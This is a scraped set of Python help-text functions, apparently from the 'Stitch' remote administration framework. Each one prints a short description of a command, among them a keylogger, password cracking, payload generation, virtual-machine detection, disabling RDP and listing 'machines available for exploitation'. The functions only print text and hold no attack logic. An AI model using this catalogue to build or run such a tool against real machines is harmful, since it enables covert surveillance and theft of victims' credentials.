示例#1
0
def st_help_keylogger():
    st_print(
        "[*] Records keystrokes of the user. Allowing you to view the status, start, stop, and dump the keystokes to screen."
    )
    usage_keylogger()
示例#2
0
def st_help_touch():
    st_print('[*] Creates a file with no contents.')
    usage_touch()
示例#3
0
def st_help_upload():
    st_print('[*] Uploads a file/dir to the system.')
    usage_upload()
示例#4
0
def st_help_stitchgen():
    st_print('[*] Generates stitch payloads based on running OS.')
    usage_stitchgen()
示例#5
0
def st_help_sudo():
    st_print("[*] Runs the preceding command with admin priveleges.")
    usage_sudo()
示例#6
0
def st_help_shell():
    st_print('[*] Opens a shell prompt of the requested session.')
    usage_shell()
示例#7
0
def st_help_ssh():
    st_print('[*] Attempts to open a ssh connection to the requested host.')
    usage_ssh()
示例#8
0
def st_help_lsmod():
    st_print('[*] Displays list of all installed drivers.')
    usage_lsmod()
示例#9
0
def st_help_listen():
    st_print('[*] Server binds to given port to listen for connections.')
    usage_listen()
示例#10
0
def st_help_ls():
    st_print('[*] Displays a list of files and subdirectories in a directory.')
    usage_ls()
示例#11
0
def usage_crackpassword():
    st_print('[*] Usage: crackpassword\n')
示例#12
0
def st_help_logintext():
    st_print("[*] Sets the text of the system's login screen.")
    usage_logintext()
示例#13
0
def st_help_lockscreen():
    st_print("[*] Enters the system's lock screen.")
    usage_lockscreen()
示例#14
0
def st_help_location():
    st_print("[*] Gives public IP and estimate geo location of the system.")
    usage_location()
示例#15
0
def st_help_screenshot():
    st_print('[*] Takes a screenshot of the screen.')
    usage_screenshot()
示例#16
0
def st_help_more():
    st_print('[*] Displays ouput of file path.')
    usage_more()
示例#17
0
def st_help_sessions():
    st_print('[*] Displays machines available for exploitation.')
    usage_sessions()
示例#18
0
def st_help_popup():
    st_print("[*] Displays popup box with custom message.")
    usage_popup()
示例#19
0
def st_help_showkey():
    st_print(
        '[*] Displays the active encrypted AES key used for payload creation.')
    usage_showkey()
示例#20
0
def st_help_pwd():
    st_print('[*] Displays the name of the current directory.')
    usage_pwd()
示例#21
0
def st_help_start():
    st_print('[*] Starts the desired file.')
    usage_start()
示例#22
0
def st_help_pyexec():
    st_print('[*] Runs python script on the system.')
    usage_pyexec()
示例#23
0
def usage_disableRDP():
    st_print('[*] Usage: disableRDP\n')
示例#24
0
def st_help_ps():
    st_print('[*] Displays list of all running processes.')
    usage_ps()
示例#25
0
def st_help_sysinfo():
    st_print('[*] Displays system information.')
    usage_sysinfo()
示例#26
0
def st_help_scanreg():
    st_print('[*] Display information on Windows Registry.')
    usage_scanreg()
示例#27
0
def st_help_unhide():
    st_print('[*] Unhides the specified file/dir from the user.')
    usage_unhide()
示例#28
0
def usage_dir():
    st_print('[*] Usage: dir\n')
示例#29
0
def st_help_vmscan():
    st_print('[*] Detects if the system is a virtual machine.')
    usage_vmscan()
示例#30
0
def st_help_ipconfig():
    st_print("[*] Displays the system's IP configuration.")
    usage_ipconfig()